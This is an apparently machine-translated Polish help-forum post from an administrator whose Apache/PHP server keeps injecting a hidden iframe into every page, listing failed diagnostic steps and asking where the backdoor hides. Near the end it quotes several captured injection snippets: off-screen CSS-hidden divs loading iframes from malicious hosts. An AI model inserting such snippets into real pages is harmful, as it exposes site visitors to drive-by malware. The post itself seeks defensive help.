Kilka miesięcy temu ukryta iFrame zaczęła pojawiać się na każdej stronie w każdej witrynie na naszym dedykowanym serwerze. Gdy zabraliśmy strony do konserwacji za pomocą 503, iFrame nadal znajdowało się na stronie konserwacji. Ostatecznie host zablokował źródło iFrame, ale nigdy nie znaleźliśmy backdoora. Wstrzyknięta iFrame wyglądała mniej więcej tak, ale zawinięta w znacznik stylu, aby zaciemnić i z różnymi adresami URL:

iframe src = "http://heusnsy.nl/32283947.html ..

Przenieśliśmy nasze mniejsze witryny do innego hosta i wszystko było w porządku.

Przenieśliśmy naszą główną stronę na nowy serwer dedykowany na tym samym hoście i pomimo naszych starań o zablokowanie serwera - zapory ogniowe, ograniczony dostęp, aktualizacje oprogramowania, sprawdzanie każdego pliku - zwrócono iFrame.

Wszędzie szukaliśmy, jak to się robi - pliki konfiguracyjne, htaccess - ale nie możemy ich znaleźć.

Jakiś pomysł, gdzie mogą być ukryte luki w zabezpieczeniach iFrame?

Edycja: Oto więcej szczegółów: Komputer z systemem Linux z systemem Apache i PHP. Najnowsze wersje wszystkiego. Kod, który został wstrzyknięty, wygląda tak:

<style>.ivx4di91j1 { position:absolute; left:-1418px; top:-1348px} </style> <div class="ivx4di91j1"><iframe src="heusnsy.nl/32283947.html..

Aktualizacja: Oto więcej informacji i tego, czego się dowiedzieliśmy:

host: Stacja CentOS Linux 6.3 - Linux 2.6.32-279.5.1.el6.x86_64 w wersji x86_64 / Apache 2.2.15 - PHP 5.3.3 (cli) (zbudowany: 3 lipca 2012 16:53:21)

Sam serwer nie jest zagrożony.

Wszystkie usługi, w tym (apache / php), są uaktualniane do najnowszych wersji dostępnych dla naszego systemu.

Żadne konta (ftp lub inne) nie zostały naruszone.

Szkodliwe oprogramowanie zmienia jednocześnie docelowy adres URL (iframe src =) jednocześnie na kilku zainfekowanych stronach. (Dzięki uprzejmości unmaskparasites.com)

Podczas zmiany celu src nie wykonano ani nie uruchomiono żadnych nieuczciwych lub ukrytych procesów.

TCPDUMP otrzymał kod złośliwego oprogramowania, pozostawiając poza portem 80 tcp, ale nie znaleziono nic dziwnego w żądaniu GET od użytkownika odbierającego szkodliwe oprogramowanie - w odpowiednich dziennikach dostępu do apache nie znaleziono nic dziwnego.

Pliki stron WWW lub pliki binarne httpd / php nie zostały w żaden sposób zmienione podczas przełączania adresu url src iFrame - dzięki kontroli md5sum.

Podczas zmiany nie było żadnych fałszywych połączeń na znanych portach dla znanych usług. Firewall dba o resztę.

rkhunter i maldet wymyślili bez rezultatów.

Malware iFrame jest uruchamiany i wstrzykiwany zaraz po pierwszym"</script>" tag na dowolnej stronie z tym tagiem na wszystkich kontach i stronach internetowych na tym serwerze.

Złośliwe oprogramowanie zostaje wstrzyknięte na statyczne strony i na strony bez połączeń z bazą danych. (wystarczy, aby strona miała<head> </script></head> tagi)

Nie zainstalowano żadnych fałszywych modułów apache ani modułów php (z wyjątkiem mycript.so). Większość domyślnych modułów Apache jest zawieszonych i skomentowanych.

Złośliwe oprogramowanie nie jest stale obecne. Przychodzi i odchodzi, czasami wyłącza się na kilka godzin, a następnie pojawia się dla kilku użytkowników i ponownie gaśnie. Sprawia to, że niezwykle trudno jest to prześledzić.

100% kodów php i większość kodów javascript uruchamianych w naszych witrynach (z wyjątkiem phpmyadmina) są kodowane na zamówienie. Jedyną rzeczą, która nie jest, są biblioteki Jquery.

Serwer jest urządzeniem o dużym natężeniu ruchu, a wyszukiwanie / dopasowywanie w dziennikach jest bardzo powolne. Tygodniowy dziennik dostępu może przekroczyć 15 GB.

Taka jest sytuacja ... Nie chodzi już o skompromitowane konta, zhakowane pliki, fałszywe skrypty. Jest to coś ponad wszystko, co do tej pory widzieliśmy, a przyczyna jest ukryta gdzieś w samym apache / php. (Przynajmniej tak myślimy). Każda pomoc i pomysły są bardzo mile widziane.

Oto przykłady wtrysku iFrame:

<script src="/templates/js/jquery-1.4.2.min.js" type="text/javascript"></script><style>.pw0xxs { position:absolute; left:-1795px; top:-1357px} </   style> <div class="pw0xxs"><iframe src="http://infectedsite.com/84064443.html" width="167" height="332"></iframe></div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js" type="text/javascript"></script><style>.h3fuonj6 { position:absolute; left :-1012px; top:-1348px} </style> <div class="h3fuonj6"><iframe src="http://infectedsite.com/13334443.html" width="236" height="564"></iframe></div >

</script><style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://infectedsite.com/79144443.html" wid th="559" height="135"></iframe></div> document.write('<style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://ksner.pl/79144443.ht ml" width="559" height="135"></iframe></div>');// ColorBox v1.3.19.3 - jQuery lightbox plugin

</script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px} </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443. html" width="163" height="409"></iframe></div>

<script src="./js/cross_framing_protection.js?ts=1344391602" type="text/javascript"></script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px}  </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443.html" width="163" height="409"></iframe></div>